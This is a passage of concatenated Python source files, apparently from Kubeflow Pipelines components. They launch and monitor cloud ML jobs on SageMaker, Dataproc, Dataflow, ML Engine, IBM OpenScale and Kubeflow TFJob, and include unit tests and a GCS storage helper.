parser.add_argument('--data_location_3', type=str.strip, required=False, help='The S3 URI of the input data source for channel 3.', default='')
parser.add_argument('--data_location_4', type=str.strip, required=False, help='The S3 URI of the input data source for channel 4.', default='')
parser.add_argument('--data_location_5', type=str.strip, required=False, help='The S3 URI of the input data source for channel 5.', default='')
parser.add_argument('--data_location_6', type=str.strip, required=False, help='The S3 URI of the input data source for channel 6.', default='')
parser.add_argument('--data_location_7', type=str.strip, required=False, help='The S3 URI of the input data source for channel 7.', default='')
parser.add_argument('--data_location_8', type=str.strip, required=False, help='The S3 URI of the input data source for channel 8.', default='')
parser.add_argument('--instance_type', required=True, choices=['ml.m4.xlarge', 'ml.m4.2xlarge', 'ml.m4.4xlarge', 'ml.m4.10xlarge', 'ml.m4.16xlarge', 'ml.m5.large', 'ml.m5.xlarge', 'ml.m5.2xlarge', 'ml.m5.4xlarge',
'ml.m5.12xlarge', 'ml.m5.24xlarge', 'ml.c4.xlarge', 'ml.c4.2xlarge', 'ml.c4.4xlarge', 'ml.c4.8xlarge', 'ml.p2.xlarge', 'ml.p2.8xlarge', 'ml.p2.16xlarge', 'ml.p3.2xlarge', 'ml.p3.8xlarge', 'ml.p3.16xlarge',
'ml.c5.xlarge', 'ml.c5.2xlarge', 'ml.c5.4xlarge', 'ml.c5.9xlarge', 'ml.c5.18xlarge'], type=str.strip, help='The ML compute instance type.', default='ml.m4.xlarge')
parser.add_argument('--instance_count', required=True, type=_utils.str_to_int, help='The registry path of the Docker image that contains the training algorithm.', default=1)
parser.add_argument('--volume_size', type=_utils.str_to_int, required=True, help='The size of the ML storage volume that you want to provision.', default=1)
parser.add_argument('--resource_encryption_key', type=str.strip, required=False, help='The AWS KMS key that Amazon SageMaker uses to encrypt data on the storage volume attached to the ML compute instance(s).', default='')
parser.add_argument('--max_run_time', type=_utils.str_to_int, required=True, help='The maximum run time in seconds for the training job.', default=86400)
parser.add_argument('--model_artifact_path', type=str.strip, required=True, help='Identifies the S3 path where you want Amazon SageMaker to store the model artifacts.')
parser.add_argument('--output_encryption_key', type=str.strip, required=False, help='The AWS KMS key that Amazon SageMaker uses to encrypt the model artifacts.', default='')
parser.add_argument('--vpc_security_group_ids', type=str.strip, required=False, help='The VPC security group IDs, in the form sg-xxxxxxxx.')
parser.add_argument('--vpc_subnets', type=str.strip, required=False, help='The ID of the subnets in the VPC to which you want to connect your hpo job.')
parser.add_argument('--network_isolation', type=_utils.str_to_bool, required=False, help='Isolates the training container.', default=True)
parser.add_argument('--traffic_encryption', type=_utils.str_to_bool, required=False, help='Encrypts all communications between ML compute instances in distributed training.', default=False)
### Start spot instance support
parser.add_argument('--spot_instance', type=_utils.str_to_bool, required=False, help='Use managed spot training.', default=False)
parser.add_argument('--max_wait_time', type=_utils.str_to_int, required=False, help='The maximum time in seconds you are willing to wait for a managed spot training job to complete.', default=86400)
parser.add_argument('--checkpoint_config', type=_utils.str_to_json_dict, required=False, help='Dictionary of information about the output location for managed spot training checkpoint data.', default='{}')
### End spot instance support
parser.add_argument('--tags', type=_utils.str_to_json_dict, required=False, help='An array of key-value pairs, to categorize AWS resources.', default='{}')
return parser
def main(argv=None):
parser = create_parser()
args = parser.parse_args()
logging.getLogger().setLevel(logging.INFO)
client = _utils.get_sagemaker_client(args.region, args.endpoint_url)
logging.info('Submitting Training Job to SageMaker...')
job_name = _utils.create_training_job(client, vars(args))
logging.info('Job request submitted. Waiting for completion...')
_utils.wait_for_training_job(client, job_name)
image = _utils.get_image_from_job(client, job_name)
model_artifact_url = _utils.get_model_artifacts_from_job(client, job_name)
logging.info('Get model artifacts %s from training job %s.', model_artifact_url, job_name)
with open('/tmp/model_artifact_url.txt', 'w') as f:
f.write(model_artifact_url)
with open('/tmp/job_name.txt', 'w') as f:
f.write(job_name)
with open('/tmp/training_image.txt', 'w') as f:
f.write(image)
logging.info('Job completed.')
if __name__== "__main__":
main()
```
#### File: delete_cluster/src/delete_cluster.py
```python
import argparse
from common import _utils
def main(argv=None):
parser = argparse.ArgumentParser(description='ML DataProc Deletion')
parser.add_argument('--project', type=str, help='Google Cloud project ID to use.')
parser.add_argument('--region', type=str, help='Which zone to run the analyzer.')
parser.add_argument('--name', type=str, help='The name of the cluster to create.')
args = parser.parse_args()
api = _utils.get_client()
print('Tearing down cluster...')
delete_response = _utils.delete_cluster(api, args.project, args.region, args.name)
print('Cluster deletion request submitted. Waiting for completion...')
_utils.wait_for_operation(api, delete_response['name'])
print('Cluster deleted.')
if __name__== "__main__":
main()
```
#### File: google/dataflow/_common_ops.py
```python
import logging
import time
import json
import os
import tempfile
from kfp_component.core import display
from .. import common as gcp_common
from ..storage import download_blob, parse_blob_path, is_gcs_path
_JOB_SUCCESSFUL_STATES = ['JOB_STATE_DONE', 'JOB_STATE_UPDATED', 'JOB_STATE_DRAINED']
_JOB_FAILED_STATES = ['JOB_STATE_STOPPED', 'JOB_STATE_FAILED', 'JOB_STATE_CANCELLED']
_JOB_TERMINATED_STATES = _JOB_SUCCESSFUL_STATES + _JOB_FAILED_STATES
def wait_for_job_done(df_client, project_id, job_id, location=None, wait_interval=30):
while True:
job = df_client.get_job(project_id, job_id, location=location)
state = job.get('currentState', None)
if is_job_done(state):
return job
elif is_job_terminated(state):
# Terminated with error state
raise RuntimeError('Job {} failed with error state: {}.'.format(
job_id,
state
))
else:
logging.info('Job {} is in pending state {}.'
' Waiting for {} seconds for next poll.'.format(
job_id,
state,
wait_interval
))
time.sleep(wait_interval)
def wait_and_dump_job(df_client, project_id, location, job,
wait_interval):
display_job_link(project_id, job)
job_id = job.get('id')
job = wait_for_job_done(df_client, project_id, job_id,
location, wait_interval)
dump_job(job)
return job
def is_job_terminated(job_state):
return job_state in _JOB_TERMINATED_STATES
def is_job_done(job_state):
return job_state in _JOB_SUCCESSFUL_STATES
def display_job_link(project_id, job):
location = job.get('location')
job_id = job.get('id')
display.display(display.Link(
href = 'https://console.cloud.google.com/dataflow/'
'jobsDetail/locations/{}/jobs/{}?project={}'.format(
location, job_id, project_id),
text = 'Job Details'
))
def dump_job(job):
gcp_common.dump_file('/tmp/kfp/output/dataflow/job.json', json.dumps(job))
gcp_common.dump_file('/tmp/kfp/output/dataflow/job_id.txt', job.get('id'))
def stage_file(local_or_gcs_path):
if not is_gcs_path(local_or_gcs_path):
return local_or_gcs_path
_, blob_path = parse_blob_path(local_or_gcs_path)
file_name = os.path.basename(blob_path)
local_file_path = os.path.join(tempfile.mkdtemp(), file_name)
download_blob(local_or_gcs_path, local_file_path)
return local_file_path
def get_staging_location(staging_dir, context_id):
if not staging_dir:
return None
staging_location = os.path.join(staging_dir, context_id)
logging.info('staging_location: {}'.format(staging_location))
return staging_location
def read_job_id_and_location(storage_client, staging_location):
if staging_location:
job_blob = _get_job_blob(storage_client, staging_location)
if job_blob.exists():
job_data = job_blob.download_as_string().decode().split(',')
# Returns (job_id, location)
logging.info('Found existing job {}.'.format(job_data))
return (job_data[0], job_data[1])
return (None, None)
def upload_job_id_and_location(storage_client, staging_location, job_id, location):
if not staging_location:
return
if not location:
location = ''
data = '{},{}'.format(job_id, location)
job_blob = _get_job_blob(storage_client, staging_location)
logging.info('Uploading {} to {}.'.format(data, job_blob))
job_blob.upload_from_string(data)
def _get_job_blob(storage_client, staging_location):
bucket_name, staging_blob_name = parse_blob_path(staging_location)
job_blob_name = os.path.join(staging_blob_name, 'kfp/dataflow/launch_python/job.txt')
bucket = storage_client.bucket(bucket_name)
return bucket.blob(job_blob_name)
```
#### File: google/dataproc/_submit_pyspark_job.py
```python
from ._submit_job import submit_job
def submit_pyspark_job(project_id, region, cluster_name,
main_python_file_uri=None, args=[], pyspark_job={}, job={},
wait_interval=30):
"""Submits a Cloud Dataproc job for running Apache PySpark applications on YARN.
Args:
project_id (str): Required. The ID of the Google Cloud Platform project
that the cluster belongs to.
region (str): Required. The Cloud Dataproc region in which to handle the
request.
cluster_name (str): Required. The cluster to run the job.
main_python_file_uri (str): Required. The HCFS URI of the main Python file to
use as the driver. Must be a .py file.
args (list): Optional. The arguments to pass to the driver. Do not include
arguments, such as --conf, that can be set as job properties, since a
collision may occur that causes an incorrect job submission.
pyspark_job (dict): Optional. The full payload of a [PySparkJob](
https://cloud.google.com/dataproc/docs/reference/rest/v1/PySparkJob).
job (dict): Optional. The full payload of a [Dataproc job](
https://cloud.google.com/dataproc/docs/reference/rest/v1/projects.regions.jobs).
wait_interval (int): The wait seconds between polling the operation.
Defaults to 30s.
Returns:
The created job payload.
Output Files:
$KFP_OUTPUT_PATH/dataproc/job_id.txt: The ID of the created job.
"""
if not pyspark_job:
pyspark_job = {}
if not job:
job = {}
if main_python_file_uri:
pyspark_job['mainPythonFileUri'] = main_python_file_uri
if args:
pyspark_job['args'] = args
job['pysparkJob'] = pyspark_job
return submit_job(project_id, region, cluster_name, job, wait_interval)
```
#### File: google/ml_engine/_deploy.py
```python
import logging
import os
from fire import decorators
from google.cloud import storage
from .. import common as gcp_common
from ..storage import parse_blob_path
from ._create_model import create_model
from ._create_version import create_version
from ._set_default_version import set_default_version
KNOWN_MODEL_NAMES = ['saved_model.pb', 'saved_model.pbtext', 'model.pkl', 'model.pkl', 'model.pkl']
@decorators.SetParseFns(python_version=str, runtime_version=str)
def deploy(model_uri, project_id, model_id=None, version_id=None,
runtime_version=None, python_version=None, model=None, version=None,
replace_existing_version=False, set_default=False, wait_interval=30):
"""Deploy a model to MLEngine from GCS URI
Args:
model_uri (str): Required, the GCS URI which contains a model file.
If no model file is found, the same path will be treated as an export
base directory of a TF Estimator. The last time-stamped sub-directory
will be chosen as model URI.
project_id (str): required, the ID of the parent project.
model_id (str): optional, the user provided name of the model.
version_id (str): optional, the user provided name of the version.
If it is not provided, the operation uses a random name.
runtime_version (str): optinal, the Cloud ML Engine runtime version
to use for this deployment. If not set, Cloud ML Engine uses
the default stable version, 1.0.
python_version (str): optinal, the version of Python used in prediction.
If not set, the default version is '2.7'. Python '3.5' is available
when runtimeVersion is set to '1.4' and above. Python '2.7' works
with all supported runtime versions.
model (dict): Optional, the JSON payload of the new model. The schema follows
[REST Model resource](https://cloud.google.com/ml-engine/reference/rest/v1/projects.models).
version (dict): Optional, the JSON payload of the new version. The schema follows
the [REST Version resource](https://cloud.google.com/ml-engine/reference/rest/v1/projects.models.versions)
replace_existing_version (boolean): boolean flag indicates whether to replace
existing version in case of conflict.
set_default (boolean): boolean flag indicates whether to set the new
version as default version in the model.
wait_interval (int): the interval to wait for a long running operation.
"""
storage_client = storage.Client()
model_uri = _search_dir_with_model(storage_client, model_uri)
gcp_common.dump_file('/tmp/kfp/output/ml_engine/model_uri.txt',
model_uri)
model = create_model(project_id, model_id, model)
model_name = model.get('name')
version = create_version(model_name, model_uri, version_id,
runtime_version, python_version, version, replace_existing_version,
wait_interval)
if set_default:
version_name = version.get('name')
version = set_default_version(version_name)
return version
def _search_dir_with_model(storage_client, model_root_uri):
bucket_name, blob_name = parse_blob_path(model_root_uri)
bucket = storage_client.bucket(bucket_name)
if not blob_name.endswith('/'):
blob_name += '/'
it = bucket.list_blobs(prefix=blob_name, delimiter='/')
for resource in it:
basename = os.path.basename(resource.name)
if basename in KNOWN_MODEL_NAMES:
logging.info('Found model file under {}.'.format(model_root_uri))
return model_root_uri
model_dir = _search_tf_export_dir_base(storage_client, bucket, blob_name)
if not model_dir:
model_dir = model_root_uri
return model_dir
def _search_tf_export_dir_base(storage_client, bucket, export_dir_base):
logging.info('Searching model under export base dir: {}.'.format(export_dir_base))
it = bucket.list_blobs(prefix=export_dir_base, delimiter='/')
for _ in it.pages:
# Iterate to the last page to get the full prefixes.
pass
timestamped_dirs = []
for sub_dir in it.prefixes:
dir_name = os.path.basename(os.path.normpath(sub_dir))
if dir_name.isdigit():
timestamped_dirs.append(sub_dir)
if not timestamped_dirs:
logging.info('No timestamped sub-directory is found under {}'.format(export_dir_base))
return None
last_timestamped_dir = max(timestamped_dirs)
logging.info('Found timestamped sub-directory: {}.'.format(last_timestamped_dir))
return 'gs://{}/{}'.format(bucket.name, last_timestamped_dir)
```
#### File: google/ml_engine/test__create_job.py
```python
import mock
import unittest
from googleapiclient import errors
from kfp_component.google.ml_engine import create_job
CREATE_JOB_MODULE = 'kfp_component.google.ml_engine._create_job'
COMMON_OPS_MODEL = 'kfp_component.google.ml_engine._common_ops'
@mock.patch(COMMON_OPS_MODEL + '.display.display')
@mock.patch(COMMON_OPS_MODEL + '.gcp_common.dump_file')
@mock.patch(CREATE_JOB_MODULE + '.KfpExecutionContext')
@mock.patch(CREATE_JOB_MODULE + '.MLEngineClient')
class TestCreateJob(unittest.TestCase):
def test_create_job_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
result = create_job('mock_project', job)
self.assertEqual(returned_job, result)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'job_ctx1'
}
)
def test_create_job_with_job_id_prefix_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'mock_job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
result = create_job('mock_project', job, job_id_prefix='mock_job_')
self.assertEqual(returned_job, result)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'mock_job_ctx1'
}
)
def test_execute_retry_job_success(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=409),
content = b'conflict'
)
mock_mlengine_client().get_job.return_value = returned_job
result = create_job('mock_project', job)
self.assertEqual(returned_job, result)
def test_create_job_use_context_id_as_name(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
context_id = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
mock_kfp_context().__enter__().context_id.return_value = context_id
create_job('mock_project', job)
mock_mlengine_client().create_job.assert_called_with(
project_id = 'mock_project',
job = {
'jobId': 'job_ctx1'
}
)
def test_execute_conflict_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'trainingInput': {
'modelDir': 'test'
},
'state': 'SUCCEEDED'
}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=409),
content = b'conflict'
)
mock_mlengine_client().get_job.return_value = returned_job
with self.assertRaises(errors.HttpError) as context:
create_job('mock_project', job)
self.assertEqual(409, context.exception.resp.status)
def test_execute_create_job_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
mock_mlengine_client().create_job.side_effect = errors.HttpError(
resp = mock.Mock(status=400),
content = b'bad request'
)
with self.assertRaises(errors.HttpError) as context:
create_job('mock_project', job)
self.assertEqual(400, context.exception.resp.status)
def test_execute_job_status_fail(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'mock_job',
'trainingInput': {
'modelDir': 'test'
},
'state': 'FAILED'
}
mock_mlengine_client().get_job.return_value = returned_job
with self.assertRaises(RuntimeError):
create_job('mock_project', job)
def test_cancel_succeed(self, mock_mlengine_client,
mock_kfp_context, mock_dump_json, mock_display):
mock_kfp_context().__enter__().context_id.return_value = 'ctx1'
job = {}
returned_job = {
'jobId': 'job_ctx1',
'state': 'SUCCEEDED'
}
mock_mlengine_client().get_job.return_value = (
returned_job)
create_job('mock_project', job)
cancel_func = mock_kfp_context.call_args[1]['on_cancel']
cancel_func()
mock_mlengine_client().cancel_job.assert_called_with(
'mock_project', 'job_ctx1'
)
```
#### File: subscribe/src/subscribe.py
```python
import json
import argparse
import re
from ibm_ai_openscale import APIClient
from ibm_ai_openscale.engines import *
from ibm_ai_openscale.utils import *
from ibm_ai_openscale.supporting_classes import PayloadRecord, Feature
from ibm_ai_openscale.supporting_classes.enums import *
from watson_machine_learning_client import WatsonMachineLearningAPIClient
from minio import Minio
def get_secret_creds(path):
with open(path, 'r') as f:
cred = f.readline().strip('\'')
f.close()
return cred
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('--aios_schema', type=str, help='AI OpenScale Schema Name', default="data_mart_credit_risk")
parser.add_argument('--model_name', type=str, help='Deployed model name', default="AIOS Spark German Risk Model - Final")
parser.add_argument('--model_uid', type=str, help='Deployed model uid', default="dummy uid")
parser.add_argument('--label_column', type=str, help='Model label column name', default="Risk")
parser.add_argument('--aios_manifest_path', type=str, help='Object storage file path for the aios manifest file', default="")
parser.add_argument('--bucket_name', type=str, help='Object storage bucket name', default="dummy-bucket-name")
parser.add_argument('--problem_type', type=str, help='Model problem type', default="BINARY_CLASSIFICATION")
args = parser.parse_args()
aios_schema = args.aios_schema
model_name = args.model_name
model_uid = args.model_uid
label_column = args.label_column
aios_manifest_path = args.aios_manifest_path
cos_bucket_name = args.bucket_name
problem_type = args.problem_type
wml_url = get_secret_creds("/app/secrets/wml_url")
wml_instance_id = get_secret_creds("/app/secrets/wml_instance_id")
wml_apikey = get_secret_creds("/app/secrets/wml_apikey")
aios_guid = get_secret_creds("/app/secrets/aios_guid")
cloud_api_key = get_secret_creds("/app/secrets/cloud_api_key")
postgres_uri = get_secret_creds("/app/secrets/postgres_uri")
cos_endpoint = get_secret_creds("/app/secrets/cos_endpoint")
cos_access_key = get_secret_creds("/app/secrets/cos_access_key")
cos_secret_key = get_secret_creds("/app/secrets/cos_secret_key")
''' Make sure http scheme is not exist for Minio '''
url = re.compile(r"https?://")
cos_endpoint = url.sub('', cos_endpoint)
WML_CREDENTIALS = {
"url": wml_url,
"instance_id": wml_instance_id,
"apikey": wml_apikey
}
AIOS_CREDENTIALS = {
"instance_guid": aios_guid,
"apikey": cloud_api_key,
"url": "https://api.aiopenscale.cloud.ibm.com"
}
if postgres_uri == '':
POSTGRES_CREDENTIALS = None
else:
POSTGRES_CREDENTIALS = {
"uri": postgres_uri
}
wml_client = WatsonMachineLearningAPIClient(WML_CREDENTIALS)
ai_client = APIClient(aios_credentials=AIOS_CREDENTIALS)
print('AIOS client version:' + ai_client.version)
''' Setup Postgres SQL and AIOS binding '''
SCHEMA_NAME = aios_schema
try:
data_mart_details = ai_client.data_mart.get_details()
if 'internal_database' in data_mart_details['database_configuration'] and data_mart_details['database_configuration']['internal_database']:
if POSTGRES_CREDENTIALS:
print('Using existing internal datamart')
else:
print('Switching to external datamart')
ai_client.data_mart.delete(force=True)
create_postgres_schema(postgres_credentials=POSTGRES_CREDENTIALS, schema_name=SCHEMA_NAME)
ai_client.data_mart.setup(db_credentials=POSTGRES_CREDENTIALS, schema=SCHEMA_NAME)
else:
print('Using existing external datamart')
except:
if POSTGRES_CREDENTIALS:
print('Setting up internal datamart')
ai_client.data_mart.setup(internal_db=True)
else:
print('Setting up external datamart')
create_postgres_schema(postgres_credentials=POSTGRES_CREDENTIALS, schema_name=SCHEMA_NAME)
ai_client.data_mart.setup(db_credentials=POSTGRES_CREDENTIALS, schema=SCHEMA_NAME)
data_mart_details = ai_client.data_mart.get_details()
binding_uid = ai_client.data_mart.bindings.add('WML instance', WatsonMachineLearningInstance(WML_CREDENTIALS))
if binding_uid is None:
binding_uid = ai_client.data_mart.bindings.get_details()['service_bindings'][0]['metadata']['guid']
bindings_details = ai_client.data_mart.bindings.get_details()
print('\nWML binding ID is ' + binding_uid + '\n')
''' Create subscriptions '''
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
for subscription in subscriptions_uids:
sub_name = ai_client.data_mart.subscriptions.get_details(subscription)['entity']['asset']['name']
if sub_name == model_name:
ai_client.data_mart.subscriptions.delete(subscription)
print('Deleted existing subscription for', model_name)
''' Obtain feature and categorical columns '''
# Download aios manifest file
cos = Minio(cos_endpoint,
access_key=cos_access_key,
secret_key=cos_secret_key,
secure=True)
cos.fget_object(cos_bucket_name, aios_manifest_path, aios_manifest_path)
# Extract necessary column names
feature_columns = []
categorical_columns = []
with open(aios_manifest_path) as f:
aios_manifest = json.load(f)
OUTPUT_DATA_SCHEMA = {'fields': aios_manifest['model_schema'], 'type': 'struct'}
for column in aios_manifest['model_schema']:
if column['metadata'].get('modeling_role', '') == 'feature':
feature_columns.append(column['name'])
if column['metadata'].get('measure', '') == 'discrete':
categorical_columns.append(column['name'])
f.close()
PROBLEMTYPE = ProblemType.BINARY_CLASSIFICATION
if problem_type == 'BINARY_CLASSIFICATION':
PROBLEMTYPE = ProblemType.BINARY_CLASSIFICATION
elif problem_type == 'MULTICLASS_CLASSIFICATION':
PROBLEMTYPE = ProblemType.MULTICLASS_CLASSIFICATION
elif problem_type == 'REGRESSION':
PROBLEMTYPE = ProblemType.REGRESSION
subscription = ai_client.data_mart.subscriptions.add(WatsonMachineLearningAsset(
model_uid,
label_column=label_column,
input_data_type=InputDataType.STRUCTURED,
problem_type=PROBLEMTYPE,
prediction_column='predictedLabel',
probability_column='probability',
feature_columns=feature_columns,
categorical_columns=categorical_columns
))
if subscription is None:
print('Exists already')
# subscription already exists; get the existing one
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
for sub in subscriptions_uids:
if ai_client.data_mart.subscriptions.get_details(sub)['entity']['asset']['name'] == model_name:
subscription = ai_client.data_mart.subscriptions.get(sub)
subscriptions_uids = ai_client.data_mart.subscriptions.get_uids()
print(subscription.get_details())
''' Scoring the model and make sure the subscriptions are setup properly '''
credit_risk_scoring_endpoint = None
deployment_uid = subscription.get_deployment_uids()[0]
print('\n' + deployment_uid + '\n')
for deployment in wml_client.deployments.get_details()['resources']:
if deployment_uid in deployment['metadata']['guid']:
credit_risk_scoring_endpoint = deployment['entity']['scoring_url']
print('Scoring endpoint is: ' + credit_risk_scoring_endpoint + '\n')
with open("/tmp/model_name", "w") as report:
report.write(model_name)
```
#### File: launcher/src/launch_tf_job.py
```python
import argparse
import datetime
import json
import os
import logging
import requests
import subprocess
import six
import time
import yaml
from py import tf_job_client
from kubernetes import client as k8s_client
from kubernetes import config
def _generate_train_yaml(src_filename, tfjob_ns, workers, pss, trainer_image, command):
"""_generate_train_yaml generates train yaml files based on train.template.yaml"""
with open(src_filename, 'r') as f:
content = yaml.safe_load(f)
content['metadata']['generateName'] = 'trainer-'
content['metadata']['namespace'] = tfjob_ns
if workers and pss:
content['spec']['tfReplicaSpecs']['PS']['replicas'] = pss
content['spec']['tfReplicaSpecs']['PS']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['PS']['template']['spec']['containers'][0]['command'] = command
content['spec']['tfReplicaSpecs']['Worker']['replicas'] = workers
content['spec']['tfReplicaSpecs']['Worker']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['Worker']['template']['spec']['containers'][0]['command'] = command
content['spec']['tfReplicaSpecs']['MASTER']['template']['spec']['containers'][0]['image'] = trainer_image
content['spec']['tfReplicaSpecs']['MASTER']['template']['spec']['containers'][0]['command'] = command
else:
# If no workers and pss set, default is 1.
master_spec = content['spec']['tfReplicaSpecs']['MASTER']
worker_spec = content['spec']['tfReplicaSpecs']['Worker']
ps_spec = content['spec']['tfReplicaSpecs']['PS']
master_spec['template']['spec']['containers'][0]['image'] = trainer_image
master_spec['template']['spec']['containers'][0]['command'] = command
worker_spec['template']['spec']['containers'][0]['image'] = trainer_image
worker_spec['template']['spec']['containers'][0]['command'] = command
ps_spec['template']['spec']['containers'][0]['image'] = trainer_image
ps_spec['template']['spec']['containers'][0]['command'] = command
return content
def main(argv=None):
parser = argparse.ArgumentParser(description='Kubeflow TFJob launcher')
parser.add_argument('--container-image', type=str,
help='''Container image to run using KubeFlow TFJob. The command line should be added after --.''')
parser.add_argument('--workers', type=int, default=0)
parser.add_argument('--pss', type=int, default=0)
parser.add_argument('--cluster', type=str,
help='GKE cluster set up for kubeflow. If set, zone must be provided. ' +
'If not set, assuming this runs in a GKE container and current ' +
'cluster is used.')
parser.add_argument('--zone', type=str, help='zone of the kubeflow cluster.')
parser.add_argument('--kfversion', type=str,
default='v1alpha2',
help='The version of the deployed kubeflow. ' +
'If not set, the default version is v1alpha2')
parser.add_argument('--tfjob-ns', type=str,
default='default',
help='The namespace where the tfjob is submitted' +
'If not set, the default namespace is default')
parser.add_argument('--tfjob-timeout-minutes', type=int,
default=10,
help='Time in minutes to wait for the TFJob to complete')
parser.add_argument('--output-dir', type=str)
parser.add_argument('--ui-metadata-type', type=str, default='tensorboard')
import sys
all_args = sys.argv[1:]
separator_idx = all_args.index('--')
launcher_args = all_args[:separator_idx]
remaining_args = all_args[separator_idx + 1:]
args = parser.parse_args(launcher_args)
logging.getLogger().setLevel(logging.INFO)
args_dict = vars(args)
if args.cluster and args.zone:
cluster = args_dict.pop('cluster')
zone = args_dict.pop('zone')
else:
# Get culster name and zone from metadata
metadata_server = "http://metadata/computeMetadata/v1/instance/"
metadata_flavor = {'Metadata-Flavor' : 'Google'}
cluster = requests.get(metadata_server + "attributes/cluster-name",
headers = metadata_flavor).text
zone = requests.get(metadata_server + "zone",
headers = metadata_flavor).text.split('/')[-1]
logging.info('Getting credentials for GKE cluster %s.' % cluster)
subprocess.call(['gcloud', 'container', 'clusters', 'get-credentials', cluster,
'--zone', zone])
workers = args_dict.pop('workers')
pss = args_dict.pop('pss')
kf_version = args_dict.pop('kfversion')
tfjob_ns = args_dict.pop('tfjob_ns')
tfjob_timeout_minutes = args_dict.pop('tfjob_timeout_minutes')
trainer_image = args.container_image or os.environ['TRAINER_IMAGE_NAME']
command=remaining_args
logging.info('Generating training template.')
template_file = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'train.template.yaml')
content_yaml = _generate_train_yaml(template_file, tfjob_ns, workers, pss, trainer_image, command)
logging.info('Start training.')
# Set up handler for k8s clients
config.load_incluster_config()
api_client = k8s_client.ApiClient()
create_response = tf_job_client.create_tf_job(api_client, content_yaml, version=kf_version)
job_name = create_response['metadata']['name']
if args.output_dir:
# Create metadata.json file for visualization.
metadata = {
'outputs' : [{
'type': args.ui_metadata_type,
'source': args.output_dir,
}]
}
with open('/mlpipeline-ui-metadata.json', 'w') as f:
json.dump(metadata, f)
wait_response = tf_job_client.wait_for_job(
api_client, tfjob_ns, job_name, kf_version,
timeout=datetime.timedelta(minutes=tfjob_timeout_minutes))
succ = True
#TODO: update this failure checking after tf-operator has the condition checking function.
if 'Worker' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['Worker']:
logging.error('Training failed since workers failed.')
succ = False
if 'PS' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['PS']:
logging.error('Training failed since PSs failed.')
succ = False
if 'MASTER' in wait_response['status']['tfReplicaStatuses']:
if 'Failed' in wait_response['status']['tfReplicaStatuses']['MASTER']:
logging.error('Training failed since MASTER failed.')
succ = False
#TODO: remove this after kubeflow fixes the wait_for_job issue
# because the wait_for_job returns when the worker finishes but the master might not be complete yet.
if 'MASTER' in wait_response['status']['tfReplicaStatuses'] and 'active' in wait_response['status']['tfReplicaStatuses']['MASTER']:
master_active = True
while master_active:
# Wait for master to finish
time.sleep(2)
wait_response = tf_job_client.wait_for_job(api_client, tfjob_ns, job_name, kf_version,
timeout=datetime.timedelta(minutes=tfjob_timeout_minutes))
if 'active' not in wait_response['status']['tfReplicaStatuses']['MASTER']:
master_active = False
if succ:
logging.info('Training success.')
tf_job_client.delete_tf_job(api_client, tfjob_ns, job_name, version=kf_version)
with open('/output.txt', 'w') as f:
f.write(args.output_dir)
if __name__== "__main__":
main()
```
#### File: kfp/containers/_gcs_helper.py
```python
from pathlib import PurePath
class GCSHelper(object):
""" GCSHelper manages the connection with the GCS storage """
@staticmethod
def get_blob_from_gcs_uri(gcs_path):
"""
Args:
gcs_path (str) : gcs blob path
Returns:
gcs_blob: gcs blob object(https://github.com/googleapis/google-cloud-python/blob/5c9bb42cb3c9250131cfeef6e0bafe8f4b7c139f/storage/google/cloud/storage/blob.py#L105)
"""
from google.cloud import storage
pure_path = PurePath(gcs_path)
gcs_bucket = pure_path.parts[1]
gcs_blob = '/'.join(pure_path.parts[2:])
client = storage.Client()
bucket = client.get_bucket(gcs_bucket)
blob = bucket.blob(gcs_blob)
return blob
@staticmethod
def upload_gcs_file(local_path, gcs_path):
"""
Args:
local_path (str): local file path
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.upload_from_filename(local_path)
@staticmethod
def remove_gcs_blob(gcs_path):
"""
Args:
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.delete()
@staticmethod
def download_gcs_blob(local_path, gcs_path):
"""
Args:
local_path (str): local file path
gcs_path (str) : gcs blob path
"""
blob = GCSHelper.get_blob_from_gcs_uri(gcs_path)
blob.download_to_filename(local_path)
@staticmethod
def create_gcs_bucket_if_not_exist(gcs_bucket):
"""
Args:
gcs_bucket (str) : gcs bucket name
"""
from google.cloud import storage
from google.cloud.exceptions import Conflict
client = storage.Client()
try:
client.create_bucket(gcs_bucket)
